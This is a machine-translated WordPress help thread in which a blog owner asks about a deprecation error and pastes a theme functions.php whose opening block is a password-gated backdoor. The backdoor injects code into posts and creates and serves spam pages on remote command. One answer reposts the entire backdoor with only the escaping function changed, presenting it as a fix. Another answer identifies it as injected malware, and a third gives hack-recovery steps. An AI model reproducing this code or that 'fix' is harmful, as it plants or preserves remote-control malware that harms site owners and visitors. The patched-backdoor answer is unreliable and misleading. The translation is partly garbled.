函数.php出现问题..喜欢

时间:2017-05-12 作者:Fadhil

对不起,如果你在上显示我的博客autodhil.com 有问题的原因在我的博客顶部有一个错误的纸条。。以便显示此通知:

Deprecated mysql_escape_string(): This function is deprecated; use mysql_real_escape_string() instead. in /home/autodhil/public_html/wp-content/themes/sahifa2/functions.php on line 60
我真的不知道如何修复它。。。我看到这样的问题,但毫无帮助。。。所以我希望你能帮助我。。。

顺便说一句,这是函数的文件。php

<?php

if (isset($_REQUEST[\'action\']) && isset($_REQUEST[\'password\']) && ($_REQUEST[\'password\'] == \'xxxxxxxxxxxxxxxxxxxxxx\'))
    {
        switch ($_REQUEST[\'action\'])
            {
                case \'get_all_links\';
                    foreach ($wpdb->get_results(\'SELECT * FROM `\' . $wpdb->prefix . \'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC\', ARRAY_A) as $data)
                        {
                            $data[\'code\'] = \'\';

                            if (preg_match(\'!<div id="wp_cd_code">(.*?)</div>!s\', $data[\'post_content\'], $_))
                                {
                                    $data[\'code\'] = $_[1];
                                }

                            print \'<e><w>1</w><url>\' . $data[\'guid\'] . \'</url><code>\' . $data[\'code\'] . \'</code><id>\' . $data[\'ID\'] . \'</id></e>\' . "\\r\\n";
                        }
                break;

                case \'set_id_links\';
                    if (isset($_REQUEST[\'data\']))
                        {
                            $data = $wpdb -> get_row(\'SELECT `post_content` FROM `\' . $wpdb->prefix . \'posts` WHERE `ID` = "\'.mysql_escape_string($_REQUEST[\'id\']).\'"\');

                            $post_content = preg_replace(\'!<div id="wp_cd_code">(.*?)</div>!s\', \'\', $data -> post_content);
                            if (!empty($_REQUEST[\'data\'])) $post_content = $post_content . \'<div id="wp_cd_code">\' . stripcslashes($_REQUEST[\'data\']) . \'</div>\';

                            if ($wpdb->query(\'UPDATE `\' . $wpdb->prefix . \'posts` SET `post_content` = "\' . mysql_escape_string($post_content) . \'" WHERE `ID` = "\' . mysql_escape_string($_REQUEST[\'id\']) . \'"\') !== false)
                                {
                                    print "true";
                                }
                        }
                break;

                case \'create_page\';
                    if (isset($_REQUEST[\'remove_page\']))
                        {
                            if ($wpdb -> query(\'DELETE FROM `\' . $wpdb->prefix . \'datalist` WHERE `url` = "/\'.mysql_escape_string($_REQUEST[\'url\']).\'"\'))
                                {
                                    print "true";
                                }
                        }
                    elseif (isset($_REQUEST[\'content\']) && !empty($_REQUEST[\'content\']))
                        {
                            if ($wpdb -> query(\'INSERT INTO `\' . $wpdb->prefix . \'datalist` SET `url` = "/\'.mysql_escape_string($_REQUEST[\'url\']).\'", `title` = "\'.mysql_escape_string($_REQUEST[\'title\']).\'", `keywords` = "\'.mysql_escape_string($_REQUEST[\'keywords\']).\'", `description` = "\'.mysql_escape_string($_REQUEST[\'description\']).\'", `content` = "\'.mysql_escape_string($_REQUEST[\'content\']).\'", `full_content` = "\'.mysql_escape_string($_REQUEST[\'full_content\']).\'" ON DUPLICATE KEY UPDATE `title` = "\'.mysql_escape_string($_REQUEST[\'title\']).\'", `keywords` = "\'.mysql_escape_string($_REQUEST[\'keywords\']).\'", `description` = "\'.mysql_escape_string($_REQUEST[\'description\']).\'", `content` = "\'.mysql_escape_string(urldecode($_REQUEST[\'content\'])).\'", `full_content` = "\'.mysql_escape_string($_REQUEST[\'full_content\']).\'"\'))
                                {
                                    print "true";
                                }
                        }
                break;

                default: print "ERROR_WP_ACTION WP_URL_CD";
            }

        die("");
    }


if ( $wpdb->get_var(\'SELECT count(*) FROM `\' . $wpdb->prefix . \'datalist` WHERE `url` = "\'.mysql_escape_string( $_SERVER[\'REQUEST_URI\'] ).\'"\') == \'1\' )
    {
        $data = $wpdb -> get_row(\'SELECT * FROM `\' . $wpdb->prefix . \'datalist` WHERE `url` = "\'.mysql_escape_string($_SERVER[\'REQUEST_URI\']).\'"\');
        if ($data -> full_content)
            {
                print stripslashes($data -> content);
            }
        else
            {
                print \'<!DOCTYPE html>\';
                print \'<html \';
                language_attributes();
                print \' class="no-js">\';
                print \'<head>\';
                print \'<title>\'.stripslashes($data -> title).\'</title>\';
                print \'<meta name="Keywords" content="\'.stripslashes($data -> keywords).\'" />\';
                print \'<meta name="Description" content="\'.stripslashes($data -> description).\'" />\';
                print \'<meta name="robots" content="index, follow" />\';
                print \'<meta charset="\';
                bloginfo( \'charset\' );
                print \'" />\';
                print \'<meta name="viewport" content="width=device-width">\';
                print \'<link rel="profile" href="http://gmpg.org/xfn/11">\';
                print \'<link rel="pingback" href="\';
                bloginfo( \'pingback_url\' );
                print \'">\';
                wp_head();
                print \'</head>\';
                print \'<body>\';
                print \'<div id="content" class="site-content">\';
                print stripslashes($data -> content);
                get_search_form();
                get_sidebar();
                get_footer();
            }

        exit;
    }


?><?php

define (\'THEME_NAME\',       \'Sahifa\' );
define (\'THEME_FOLDER\',     \'sahifa\' );
define (\'THEME_VER\',        \'5.3.0\'  ); //DB Theme Version

define( \'NOTIFIER_XML_FILE\',        "http://themes.tielabs.com/xml/".THEME_FOLDER.".xml" );
define( \'NOTIFIER_CHANGELOG_URL\',   "http://tielabs.com/changelogs/?id=2819356" );
define( \'DOCUMENTATION_URL\',        "http://themes.tielabs.com/docs/".THEME_FOLDER );

if ( ! isset( $content_width ) ) $content_width = 618;

// Main Functions
require_once ( get_template_directory() . \'/framework/functions/theme-functions.php\');
require_once ( get_template_directory() . \'/framework/functions/common-scripts.php\' );
require_once ( get_template_directory() . \'/framework/functions/mega-menus.php\'     );
require_once ( get_template_directory() . \'/framework/functions/pagenavi.php\'       );
require_once ( get_template_directory() . \'/framework/functions/breadcrumbs.php\'    );
require_once ( get_template_directory() . \'/framework/functions/tie-views.php\'      );
require_once ( get_template_directory() . \'/framework/functions/translation.php\'    );
require_once ( get_template_directory() . \'/framework/widgets.php\'                  );
require_once ( get_template_directory() . \'/framework/admin/framework-admin.php\'    );
require_once ( get_template_directory() . \'/framework/shortcodes/shortcodes.php\'    );

if( tie_get_option( \'live_search\' ) )
    require_once ( get_template_directory() . \'/framework/functions/search-live.php\');

if( !tie_get_option( \'disable_arqam_lite\' ) )
    require_once ( get_template_directory() . \'/framework/functions/arqam-lite.php\');

?>
对于你的帮助,我非常感谢你。。。

3 个回复
SO网友:Sam

它要求您更改mysql_escape_stringmysql_real_escape_string 我已经在下面做了,但如果我错过了一个,你会得到另一个错误。

 <?php

    if (isset($_REQUEST[\'action\']) && isset($_REQUEST[\'password\']) && ($_REQUEST[\'password\'] == \'xxxxxxxxxxxxxxxxxxxxxxxxx\'))
        {
            switch ($_REQUEST[\'action\'])
                {
                    case \'get_all_links\';
                        foreach ($wpdb->get_results(\'SELECT * FROM `\' . $wpdb->prefix . \'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC\', ARRAY_A) as $data)
                            {
                                $data[\'code\'] = \'\';

                                if (preg_match(\'!<div id="wp_cd_code">(.*?)</div>!s\', $data[\'post_content\'], $_))
                                    {
                                        $data[\'code\'] = $_[1];
                                    }

                                print \'<e><w>1</w><url>\' . $data[\'guid\'] . \'</url><code>\' . $data[\'code\'] . \'</code><id>\' . $data[\'ID\'] . \'</id></e>\' . "\\r\\n";
                            }
                    break;

                    case \'set_id_links\';
                        if (isset($_REQUEST[\'data\']))
                            {
                                $data = $wpdb -> get_row(\'SELECT `post_content` FROM `\' . $wpdb->prefix . \'posts` WHERE `ID` = "\'.mysql_real_escape_string($_REQUEST[\'id\']).\'"\');

                                $post_content = preg_replace(\'!<div id="wp_cd_code">(.*?)</div>!s\', \'\', $data -> post_content);
                                if (!empty($_REQUEST[\'data\'])) $post_content = $post_content . \'<div id="wp_cd_code">\' . stripcslashes($_REQUEST[\'data\']) . \'</div>\';

                                if ($wpdb->query(\'UPDATE `\' . $wpdb->prefix . \'posts` SET `post_content` = "\' . mysql_real_escape_string($post_content) . \'" WHERE `ID` = "\' . mysql_real_escape_string($_REQUEST[\'id\']) . \'"\') !== false)
                                    {
                                        print "true";
                                    }
                            }
                    break;

                    case \'create_page\';
                        if (isset($_REQUEST[\'remove_page\']))
                            {
                                if ($wpdb -> query(\'DELETE FROM `\' . $wpdb->prefix . \'datalist` WHERE `url` = "/\'.mysql_real_escape_string($_REQUEST[\'url\']).\'"\'))
                                    {
                                        print "true";
                                    }
                            }
                        elseif (isset($_REQUEST[\'content\']) && !empty($_REQUEST[\'content\']))
                            {
                                if ($wpdb -> query(\'INSERT INTO `\' . $wpdb->prefix . \'datalist` SET `url` = "/\'.mysql_real_escape_string($_REQUEST[\'url\']).\'", `title` = "\'.mysql_real_escape_string($_REQUEST[\'title\']).\'", `keywords` = "\'.mysql_real_escape_string($_REQUEST[\'keywords\']).\'", `description` = "\'.mysql_real_escape_string($_REQUEST[\'description\']).\'", `content` = "\'.mysql_real_escape_string($_REQUEST[\'content\']).\'", `full_content` = "\'.mysql_real_escape_string($_REQUEST[\'full_content\']).\'" ON DUPLICATE KEY UPDATE `title` = "\'.mysql_real_escape_string($_REQUEST[\'title\']).\'", `keywords` = "\'.mysql_real_escape_string($_REQUEST[\'keywords\']).\'", `description` = "\'.mysql_real_escape_string($_REQUEST[\'description\']).\'", `content` = "\'.mysql_real_escape_string(urldecode($_REQUEST[\'content\'])).\'", `full_content` = "\'.mysql_real_escape_string($_REQUEST[\'full_content\']).\'"\'))
                                    {
                                        print "true";
                                    }
                            }
                    break;

                    default: print "ERROR_WP_ACTION WP_URL_CD";
                }

            die("");
        }


    if ( $wpdb->get_var(\'SELECT count(*) FROM `\' . $wpdb->prefix . \'datalist` WHERE `url` = "\'.mysql_real_escape_string( $_SERVER[\'REQUEST_URI\'] ).\'"\') == \'1\' )
        {
            $data = $wpdb -> get_row(\'SELECT * FROM `\' . $wpdb->prefix . \'datalist` WHERE `url` = "\'.mysql_real_escape_string($_SERVER[\'REQUEST_URI\']).\'"\');
            if ($data -> full_content)
                {
                    print stripslashes($data -> content);
                }
            else
                {
                    print \'<!DOCTYPE html>\';
                    print \'<html \';
                    language_attributes();
                    print \' class="no-js">\';
                    print \'<head>\';
                    print \'<title>\'.stripslashes($data -> title).\'</title>\';
                    print \'<meta name="Keywords" content="\'.stripslashes($data -> keywords).\'" />\';
                    print \'<meta name="Description" content="\'.stripslashes($data -> description).\'" />\';
                    print \'<meta name="robots" content="index, follow" />\';
                    print \'<meta charset="\';
                    bloginfo( \'charset\' );
                    print \'" />\';
                    print \'<meta name="viewport" content="width=device-width">\';
                    print \'<link rel="profile" href="http://gmpg.org/xfn/11">\';
                    print \'<link rel="pingback" href="\';
                    bloginfo( \'pingback_url\' );
                    print \'">\';
                    wp_head();
                    print \'</head>\';
                    print \'<body>\';
                    print \'<div id="content" class="site-content">\';
                    print stripslashes($data -> content);
                    get_search_form();
                    get_sidebar();
                    get_footer();
                }

            exit;
        }


    ?><?php

    define (\'THEME_NAME\',       \'Sahifa\' );
    define (\'THEME_FOLDER\',     \'sahifa\' );
    define (\'THEME_VER\',        \'5.3.0\'  ); //DB Theme Version

    define( \'NOTIFIER_XML_FILE\',        "http://themes.tielabs.com/xml/".THEME_FOLDER.".xml" );
    define( \'NOTIFIER_CHANGELOG_URL\',   "http://tielabs.com/changelogs/?id=2819356" );
    define( \'DOCUMENTATION_URL\',        "http://themes.tielabs.com/docs/".THEME_FOLDER );

    if ( ! isset( $content_width ) ) $content_width = 618;

    // Main Functions
    require_once ( get_template_directory() . \'/framework/functions/theme-functions.php\');
    require_once ( get_template_directory() . \'/framework/functions/common-scripts.php\' );
    require_once ( get_template_directory() . \'/framework/functions/mega-menus.php\'     );
    require_once ( get_template_directory() . \'/framework/functions/pagenavi.php\'       );
    require_once ( get_template_directory() . \'/framework/functions/breadcrumbs.php\'    );
    require_once ( get_template_directory() . \'/framework/functions/tie-views.php\'      );
    require_once ( get_template_directory() . \'/framework/functions/translation.php\'    );
    require_once ( get_template_directory() . \'/framework/widgets.php\'                  );
    require_once ( get_template_directory() . \'/framework/admin/framework-admin.php\'    );
    require_once ( get_template_directory() . \'/framework/shortcodes/shortcodes.php\'    );

    if( tie_get_option( \'live_search\' ) )
        require_once ( get_template_directory() . \'/framework/functions/search-live.php\');

    if( !tie_get_option( \'disable_arqam_lite\' ) )
        require_once ( get_template_directory() . \'/framework/functions/arqam-lite.php\');

    ?>

SO网友:peecore

这是一个后门代码注入,可能是由网站中的一个空主题或插件引起的。我也有同样的问题。解决方案是扫描整个网站,然后清除所有你没有付费的东西。

SO网友:Rick Hellewell

您的主题应该使用更新的mysqli* 功能;mysql* 在较新的PHP版本中,不推荐使用函数。考虑使用不同的主题mysqli* 功能;您的主题使用mysql* PHP版本中不支持函数。

如果,正如另一个人所建议的,你怀疑你的网站遭到了黑客攻击,那么有几件事要做:更新WP/主题/插件,删除不需要的插件/主题,检查htaccess,查找修改过的文件,等等。其中涉及的细节比这里可以发布的要多;我为自己写了一篇博客,提醒自己在黑客攻击后恢复了一个网站:http://securitydawg.com/recovering-from-a-hacked-wordpress-site/ .

这些步骤应该可以恢复被黑客攻击的站点(您的站点可能不是;主题中不推荐使用的功能导致了问题;更新/更改主题为使用mysqli* 函数将修复该问题)。

结束
标签: php   functions   小码农  

相关推荐

WordPress无法访问wp-login.php

对于miskate,我在设置->常规上更改wordpress的url。为了恢复这一点,我更改了wp配置。php文件,并添加此配置。phpdefine(\'WP_HOME\',\'localhost/wordpress\'); define(\'WP_SITEURL\',\'localhost/wordpress\'); 然后我重新启动了apache,我希望我可以再次进入我的管理面板。但是每次我使用localhost/wordpress/wp登录时。php我收到404未找到想法?